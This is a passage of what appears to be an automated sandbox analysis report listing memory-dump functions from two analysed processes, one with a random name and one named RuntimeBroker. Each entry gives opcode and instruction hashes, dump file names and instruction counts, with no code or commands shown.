                                                                      Function 00007FFD9B880C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 18492fa5b412284db1c3ff699cd035b4e7ff6c48624e43456a582777c1716721
                                                                      • Instruction ID: faa1819da2502a0ad01c664c2f809fcc33b765d06397307b2b9873a22ee168ab
                                                                      • Opcode Fuzzy Hash: 18492fa5b412284db1c3ff699cd035b4e7ff6c48624e43456a582777c1716721
                                                                      • Instruction Fuzzy Hash: 6301B134E1EB8D8FE722DBA8886009C7FB1EF0A700F1542F7C064DB2A2D9386B448740
                                                                      Function 00007FFD9B8BA4F9 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b92b177e51bca1c4fb2a3ef61b2fd6b9f2fb0047258b234c961a954c82bb4d4e
                                                                      • Instruction ID: 77f2b94dfed055e60185750f462829220b5dd4742be45eddcbe3ad672e63a436
                                                                      • Opcode Fuzzy Hash: b92b177e51bca1c4fb2a3ef61b2fd6b9f2fb0047258b234c961a954c82bb4d4e
                                                                      • Instruction Fuzzy Hash: 9FF0A031B0EBC80FC72A566948A5461BFF1DB5B50134A42EBC096C76A3ED58AC8A8741
                                                                      Function 00007FFD9B881C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: 287aa91712236030890db3c272fa8ac65967a50ff44a1cbec6535cb76fa1bd7f
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: 82F0E134B59C1E8BEBB4E754C8647B87362FF58711F5542B9C01D931B1DE386A818B40
                                                                      Function 00007FFD9B880B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd3852e97d2e0f820c2be246b407bfd78cf3776febf2094ebfa7a52b98e55e5b
                                                                      • Instruction ID: 6fa66548abc884b11eee23f588d73ab305473288c75d4d9e2e84a36448d34bec
                                                                      • Opcode Fuzzy Hash: dd3852e97d2e0f820c2be246b407bfd78cf3776febf2094ebfa7a52b98e55e5b
                                                                      • Instruction Fuzzy Hash: A5F0EC3571EA49CFC7419B38DC959D47B60EF4721575614FAC045C7562C220586DCB44
                                                                      Function 00007FFD9B881CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: 803264af3c1263167d18239ee7d1e1f8fee25834df9acc3b90c9e06db6281327
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 25F03030F1D80E4BEBB0E758C8643B83352AF8C711F5542B5C06DA32F1DD38BA418640
                                                                      Function 00007FFD9B8B74D5 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction ID: 61484d8e8594f2f1734c6e5b520932ee8ab145b669cd3bbd614052aabc2c8954
                                                                      • Opcode Fuzzy Hash: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction Fuzzy Hash: A0E06D26B0A7844FD72E1A384C354A43B518F6A22A75A04A6D046CF6F3D8159D498752
                                                                      Function 00007FFD9B893EB8 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b0f4577047a13c1ec37432585aa94c2acc64d157bd76f4d334acad06894f377
                                                                      • Instruction ID: cf7323b7dee69fb20124a3a0a0069c75137caebb7c7a8c833ab36ca8c1c856b3
                                                                      • Opcode Fuzzy Hash: 7b0f4577047a13c1ec37432585aa94c2acc64d157bd76f4d334acad06894f377
                                                                      • Instruction Fuzzy Hash: D8F08235E0850E8BFF18EB84CC659BD77B5FB54340F500679C426DB2E8DEB46A058780
                                                                      Function 00007FFD9B8810F0 Relevance: .0, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7275e98a459ca0745918ee990ed9c6374bd3b976131742bed974f0b44f2b477
                                                                      • Instruction ID: bad4a3537cf278d5b30eefd1356d6ee66a65bfb7068f2f778c413d39b2f047ef
                                                                      • Opcode Fuzzy Hash: e7275e98a459ca0745918ee990ed9c6374bd3b976131742bed974f0b44f2b477
                                                                      • Instruction Fuzzy Hash: 1CE02621F4CC4907EB6CB6746CB29B07280DB8931570505B9D02AC22D6DC191CC14281
                                                                      Function 00007FFD9B8BD459 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e5abb35f363b92277f09d0fd328a6386718c7c60b6b2f3066efd6a6ac2b2b331
                                                                      • Instruction ID: 17bdae0b5dd683b1c8f169738a7c680d3b1b3db7ae7e953b74fc3c039f886d51
                                                                      • Opcode Fuzzy Hash: e5abb35f363b92277f09d0fd328a6386718c7c60b6b2f3066efd6a6ac2b2b331
                                                                      • Instruction Fuzzy Hash: ECE04F6294F7C08FC70B9B3588B89507F70EE1761074A51EBC086CF5B3D91A988AC701
                                                                      Function 00007FFD9B8842E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c64695b81e6585039d7816f2c7d4c58fcb5e288745750251d198ed1914d2482b
                                                                      • Instruction ID: ea53562b298a7cef6d0ecbbcc73d98e4d95cf38cf1b431bf811de6bbc4c20518
                                                                      • Opcode Fuzzy Hash: c64695b81e6585039d7816f2c7d4c58fcb5e288745750251d198ed1914d2482b
                                                                      • Instruction Fuzzy Hash: 41F02230518A1CCFCF98EB48C495EE9B7F1FB68305F154599914AE72A0CB31AA80CF85
                                                                      Function 00007FFD9B894622 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction ID: db2089bf6cea7e1a06ef7e179f895c5446392ea2fb49f52bd58def3912abaef7
                                                                      • Opcode Fuzzy Hash: c0186bf66b95d362cb25a69d1c9eaecfc839f880f9ecefc7387d894ca53d3705
                                                                      • Instruction Fuzzy Hash: ABE04F32B0DC0E47FB76AB51C8705BB3793EBD8315B160239C02BC25A1EE68A7028641
                                                                      Function 00007FFD9B882AD5 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction ID: eb8d435e5286572925d122d2b9fd02f75a7c9531e29c9c9fdf170340d7b3d0e9
                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 64E01270E0D91A47FBA4A794D8617F962A0DF5C300F1210B8D51ED33D1CD38AF418645
                                                                      Function 00007FFD9B8BA050 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8BA0E0 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFD9B8B7489 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5261710265ed54c75a270379535fd34eb7994ce1e042bafcd929347f41f08012
                                                                      • Instruction ID: 038ce7341d9c1231b9a5bc7753a7dd2c7098abc472abf670ba3bd481a0413afa
                                                                      • Opcode Fuzzy Hash: 5261710265ed54c75a270379535fd34eb7994ce1e042bafcd929347f41f08012
                                                                      • Instruction Fuzzy Hash: C6E01A2594E7C04FC70B9B7488688507FA09E1721174A40EBC085CF1B3E5298949CB11
                                                                      Function 00007FFD9B8BD4D9 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ed02685ae20b887f9d1b14b96f071fb218a9fca74753faadcff3a74b173d1d4d
                                                                      • Instruction ID: 8610c3d0c9b04dae6a64dd26f5afb267e6645950a4da6107bd0783e7cf4d1185
                                                                      • Opcode Fuzzy Hash: ed02685ae20b887f9d1b14b96f071fb218a9fca74753faadcff3a74b173d1d4d
                                                                      • Instruction Fuzzy Hash: 48E04F2194F7C04FC71B973488788507F60DE6721078A40EEC085CF5B3D5199849C702
                                                                      Function 00007FFD9B8B1C90 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8BB388 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: 1e45722583cf6f59798a1ebeba0d37c1815f9ef8acaa01b3bc1d4c35395ae455
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 68D02230B518040FC70CA738885883033A0EB6E20678100B8D00ACB2B1D92AEC88CB80
                                                                      Function 00007FFD9B8B6A90 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B8B1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b8b1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: a17d1d1b526b554f1f01fb16b81e804e53e8457bb8d4225cd09ae00d7c525fa3
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: C7D02234B549040FC70CA73888588303390EB6E2177C100A8D00AC72B1E92ADC88CB80
                                                                      Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction ID: bb478eeaa9c7badbdeca6c84a0b576d85651ce9acd592571ea276c0665c7911e
                                                                      • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction Fuzzy Hash: F7C04C05F6BE1F03F835B7EE98660ACA1405FDDA10FE70172D56D500F19C6E22D64196
                                                                      Function 00007FFD9B881310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: 6f20951d9237b8f00f29a896bec8088e29ba947ab2b423b5f39f2b5b06c8b41b
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: E8C08C30511C0C8FC908FB28C88480433A0FF0D300BC20090E009C72B0E229DDC2C740
                                                                      Function 00007FFD9B884E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: 159628d0f97664bdb91228d81ec8ec70b08acef9f2a7ece60a3a7ae8ab4a089f
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: 27C08CA1E2820986F324AAA048291AAB3828F08220F52867280ADA60A5DE3856025280
                                                                      Function 00007FFD9B882555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 194606c0fbcdaf02b82e54ab0bd7134850e7a8a2eecbf495255b6e0df667dad1
                                                                      • Instruction ID: f2fc5b5ee96e9b37913a37d4b84dbcc0137f7109ba853e67d70f8812fa941ae4
                                                                      • Opcode Fuzzy Hash: 194606c0fbcdaf02b82e54ab0bd7134850e7a8a2eecbf495255b6e0df667dad1
                                                                      • Instruction Fuzzy Hash: B7C04C05F18C1A47F3597614543157E44929B88754F9544B8E41ED76CECD5C5A1602C7
                                                                      Function 00007FFD9B89685C Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b890000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4762f76aaffb547152c9fc367386d6c38ad1cfca32d814db8fa2d53e4a5583dc
                                                                      • Instruction ID: a93bc74dbc6caa178b94e3da12016f05f00c9abb67ad482c8bbe1fd791f62ea6
                                                                      • Opcode Fuzzy Hash: 4762f76aaffb547152c9fc367386d6c38ad1cfca32d814db8fa2d53e4a5583dc
                                                                      • Instruction Fuzzy Hash: 18D0C930D055298FEBA0DB548890BA876B1AF48300F5000F6800CE3295CA356D80DB50
                                                                      Function 00007FFD9B8806C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: ba6e37ca9a45537bbcdea9ebd158e69059ca973053a3aa372a6bcd614f8fb31a
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: ACB01200E67C0F02E42433FB0C520A470405F8C100FC30070D42D500A1985E12950282

                                                                      Non-executed Functions

                                                                      Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001D.00000002.2481094438.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_29_2_7ffd9b880000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                      • Instruction ID: 3d574d97b2c9719f86ed7e5dbedaa552d132db20c9526dfaba96c0b5eb06fca4
                                                                      • Opcode Fuzzy Hash: bb6db4555ec8a96844f600108284c5dbe3dc6a4c4a6928bd76af170f331cd35b
                                                                      • Instruction Fuzzy Hash: 0C41D187F1853785E31E33FD792A9EC5B40CF8523DB0846B7E16E8A0D76C88648792E5

                                                                      Executed Functions

                                                                      Function 00007FFD9B8A0D78 Relevance: .3, Instructions: 254COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21fc7b0f36cc50357e1df01721c35ad9532412e7a64611eff18ec904fbf7d502
                                                                      • Instruction ID: 264749bf7a7d306996c5df7b6ad94def4a3a0e395579c4aa4e26dcbd2219f9b1
                                                                      • Opcode Fuzzy Hash: 21fc7b0f36cc50357e1df01721c35ad9532412e7a64611eff18ec904fbf7d502
                                                                      • Instruction Fuzzy Hash: 0B910071A19ADD8FE789DF6888697A8BFE0FB9A314F4001BAD049D72D6DB781411C740
                                                                      Function 00007FFD9B8A0B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9
                                                                      • API String ID: 0-3426396564
                                                                      • Opcode ID: a67a74c0d4445ede9f9fa01ca99bfc5a39268d76eb2c862042448bc3eeb934c0
                                                                      • Instruction ID: 30c29aad53f8bf5e07bb3415ca3623ee1121b809e52daa32141de97c3ae58943
                                                                      • Opcode Fuzzy Hash: a67a74c0d4445ede9f9fa01ca99bfc5a39268d76eb2c862042448bc3eeb934c0
                                                                      • Instruction Fuzzy Hash: 0D01FD2772B95E8BC6016B2DF8505E8BB50EB87232B9603FBD444CB1A2E511185EC7D0
                                                                      Function 00007FFD9B8A0940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000001E.00000002.2640498534.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_30_2_7ffd9b8a0000_RuntimeBroker.jbxd
